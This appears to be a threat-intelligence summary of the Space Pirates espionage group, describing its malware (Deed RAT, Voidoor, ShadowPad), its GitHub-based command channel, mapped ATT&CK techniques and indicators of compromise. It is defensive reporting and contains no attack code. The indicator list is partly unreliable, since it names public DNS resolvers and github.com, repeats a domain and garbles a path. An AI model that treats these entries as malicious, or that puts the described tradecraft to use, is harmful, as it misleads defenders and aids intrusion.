Threat Research

Space Pirates: a look into the group’s unconventional techniques, new attack vectors, and tools

PTsecurity-ESC

Space Pirates, a threat group active since 2017, is profiled by PT ESC with its evolving toolkit and novel attack vectors, including Deed RAT and Voidoor, plus a GitHub- and forum-based C2 approach. The report notes expanded targets in Russia and Serbia across government, education, energy, and private sector, while attackers increasingly reuse infrastructure, tools, and public utilities to conduct espionage and data theft. #SpacePirates #ShadowPad #DeedRAT #Voidoor #Acunetix #GitHub #SerbianMinistry

Keypoints

  • PT ESC identifies Space Pirates as a long-running group (active since at least 2017) that expanded its target geography to Russia and Serbia, targeting government, education, and sectoral organisations.
  • The group uses Acunetix to probe for vulnerabilities, signaling a new attack vector and recon capability; Acunetix-related activity is tied to a vulnerability-scanning phase.
  • ShadowPad is used by Space Pirates, with a chain of SSL certificates indicating its activity; a copy of ShadowPad was found in the victim environment.
  • Deed RAT is the primary backdoor, with active development, a 64-bit variant, and modular plugins (Disk and Portmap) providing disk and network functions.
  • Voidoor is a secondary malware delivered from an already-infected host, featuring a complex GitHub/voidtools-based command lifecycle and a multi-stage, XOR-encrypted string workflow.
  • The group leverages GitHub repositories as a C2/data pipeline (victim lists, shellcode, and commands) and uses the voidtools forum to extend command and control capabilities.
  • Public tools (Mimikatz, PsExec, NBTscan, and more) accompany Space Pirates’ operations, highlighting reliance on widely available network utilities and custom Golang-based tools.

MITRE Techniques

  • [T1595.002] Active Scanning: Vulnerability Scanning – The Space Pirates group uses Acunetix to search for vulnerabilities in victim infrastructures. “The Space Pirates group uses Acunetix to search for vulnerabilities in victim infrastructures.”
  • [T1566.001] Phishing: Spearphishing Attachment – Space Pirates uses phishing emails with malicious attachments. “Space Pirates uses phishing emails with malicious attachments.”
  • [T1566.002] Phishing: Spearphishing Link – Space Pirates uses phishing emails with links to malware. “Space Pirates uses phishing emails with links to malware.”
  • [T1059.003] Command and Scripting Interpreter: Windows Command Shell – Space Pirates malware features remote command shell functionality. “remote command shell functionality.”
  • [T1059.005] Command and Scripting Interpreter: Visual Basic – Space Pirates uses VBS scripts, including ReVBShell. “VBS scripts, including ReVBShell.”
  • [T1106] Native API – Space Pirates malware uses WinAPI functions to run new processes and implement shellcode. “WinAPI functions to run new processes and implement shellcode.”
  • [T1053.002] Scheduled Task/Job: At (Windows) – Space Pirates uses atexec.py to run commands on a remote host. “atexec.py to run commands on a remote host”
  • [T1053.005] Scheduled Task/Job: Scheduled Task – Space Pirates uses system tasks. “Scheduled Task”
  • [T1569.002] System Services: Service Execution – Space Pirates creates malicious services. “creates malicious services”
  • [T1543.003] Create or Modify System Process: Windows Service – Space Pirates creates malicious services for persistence on the host. “Windows Service”
  • [T1546.015] Event Triggered Execution: COM Hijacking – RtlShare malware persists in the system through substitution of the MruPidlList COM object. “MruPidlList COM object.”
  • [T1547.001] Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder – Space Pirates can place a shortcut in the autorun folder and use the Run and RunOnce registry keys. “autorun folder and use the Run and RunOnce registry keys”
  • [T1068] Exploitation for Privilege Escalation – Space Pirates can exploit the CVE-2017-0213 vulnerability for privilege escalation. “CVE-2017-0213 vulnerability”
  • [T1027.001] Obfuscated Files or Information: Binary Padding – The RtlShare dropper adds random bytes to the extracted payload. “adds random bytes to the extracted payload”
  • [T1027.002] Obfuscated Files or Information: Software Packing – One of the stages of the BH_A006 malware is obfuscated using an unknown protector. “obfuscated using an unknown protector”
  • [T1036.004] Masquerading: Masquerade Task or Service – Space Pirates uses legitimate-looking names when creating services. “legitimate-looking names when creating services”
  • [T1036.005] Masquerading: Match Legitimate Name or Location – Space Pirates masks its malware as legitimate software. “masks its malware as legitimate software”
  • [T1055] Process Injection – Space Pirates malware can inject shellcode into other processes. “inject shellcode into other processes”
  • [T1055.001] Process Injection: DLL Injection – Space Pirates malware can inject DLLs with payload into other processes. “DLL injections”
  • [T1078.002] Valid Accounts: Domain Accounts – Space Pirates uses compromised privileged credentials. “compromised privileged credentials”
  • [T1112] Modify Registry – Deed RAT stores all its data in the registry, including configuration and plugins. “stores all its data in the registry”
  • [T1140] Deobfuscate/Decode Files or Information – Space Pirates uses various algorithms to encrypt configuration data and payload. “encrypt configuration data and payload”
  • [T1197] BITS Jobs – Space Pirates uses BITS jobs to download malware. “BITS jobs”
  • [T1218.011] Signed Binary Proxy Execution: Rundll32 – Space Pirates can use rundll32.exe to run DLLs. “Rundll32”
  • [T1553.002] Subvert Trust Controls: Code Signing – Space Pirates uses stolen certificates to sign some Zupdax instances. “stolen certificates to sign”
  • [T1564.001] Hide Artifacts: Hidden Files and Directories – Space Pirates can store its malware in hidden folders at C:ProgramData. “hidden folders”
  • [T1574.002] Hijack Execution Flow: DLL Side-Loading – Space Pirates uses legitimate applications vulnerable to DLL side-loading. “DLL side-loading”
  • [T1620] Reflective Code Loading – Space Pirates malware uses reflective loading to run payloads in memory. “Reflective loading”
  • [T1555.003] Credentials from Password Stores: Chrome – Space Pirates uses the Chromepass tool to retrieve passwords from Chrome browser storage. “Chromepass tool”
  • [T1003.001] OS Credential Dumping: LSASS Memory – Space Pirates gets LSASS process dumps for credential dumping. “LSASS process dumps”
  • [T1040] Network Sniffing – Deed RAT collects information about in-use proxies through network sniffing. “network sniffing”
  • [T1087.001] Account Discovery: Local Account – Space Pirates collects information about users through the query user command. “query user”
  • [T1087.002] Domain Account – Space Pirates collects information about users in the domain through the legitimate CSVDE tool. “CSVDE tool”
  • [T1082] System Information Discovery – Space Pirates collects system information (OS, CPU, memory, disk). “system information”
  • [T1016] System Network Configuration Discovery – Space Pirates collects information about the network settings. “network settings”
  • [T1069.002] Permission Groups Discovery: Domain Groups – Space Pirates collects domain group info via CSVDE. “domain groups”
  • [T1083] File and Directory Discovery – Space Pirates collects information about .doc and .pdf files. “docs and pdf files”
  • [T1033] System Owner/User Discovery – Space Pirates collects user information. “users”
  • [T1057] Process Discovery – Space Pirates uses tasklist.exe to retrieve process information. “tasklist.exe”
  • [T1021.002] Remote Services: SMB/Windows Admin Shares – Space Pirates uses atexec.py and psexec.rb to move laterally. “atexec.py and psexec.rb”
  • [T1119] Automated Collection – Space Pirates searches for and copies *.doc and *.pdf. “searches for and copies files”
  • [T1560.001] Archive Collected Data: Archive via Utility – Space Pirates zips stolen documents with 7-Zip. “zip stolen documents into password-protected archives using 7-Zip”
  • [T1056.001] Input Capture: Keylogging – Space Pirates malware can capture user input. “keylogging”
  • [T1071.001] Web Protocols: Web Protocols – Deed RAT encapsulates its protocol in HTTP/HTTPS. “HTTP and HTTPS”
  • [T1095] Non-Application Layer Protocol – Space Pirates uses its own protocols to communicate with the C2 server. “own protocols to communicate”
  • [T1102.002] Web Service: Bidirectional Communication – Space Pirates uses a combination of the voidtools forum and GitHub as the C&C server. “combination of the voidtools forum and GitHub as the C&C server”
  • [T1105] Ingress Tool Transfer – Space Pirates downloads additional utilities from the C2 server using the certutil tool. “downloads additional utilities … certutil”
  • [T1573.001] Encrypted Channel: Symmetric Cryptography – Space Pirates encrypts network messages using symmetric algorithms. “encrypt network messages”
  • [T1571] Non-Standard Port – Space Pirates uses non-standard ports (8081, 5351, 63514) for C2. “non-standard ports”
  • [T1572] Protocol Tunneling – The dog-tunnel utility is used for traffic tunneling. “traffic tunneling”
  • [T1090.001] Proxy: Internal Proxy – Deed RAT can discover and use proxies to connect to its C2. “internal proxy”

Indicators of Compromise

  • [IP Address] context – 8.8.8.8, 1.1.1.1, 9.9.9.9, and 222.222.67[.]208 (DNS-related servers referenced in configuration)
  • [Domain] context – ruclient.dns04.com.ruclient.dns04.com (DDNS URL); api.github.com; github.com
  • [Hash] context – 164adc449d458c4b0819bb348db9b07ca2fc367d; 1A11878899834F1591DFADC277B2132E
  • [FileName] context – ConsoleApplication1.exe; orderFile.txt; silentBase.bat

Read more: https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/space-pirates-a-look-into-the-group-s-unconventional-techniques-new-attack-vectors-and-tools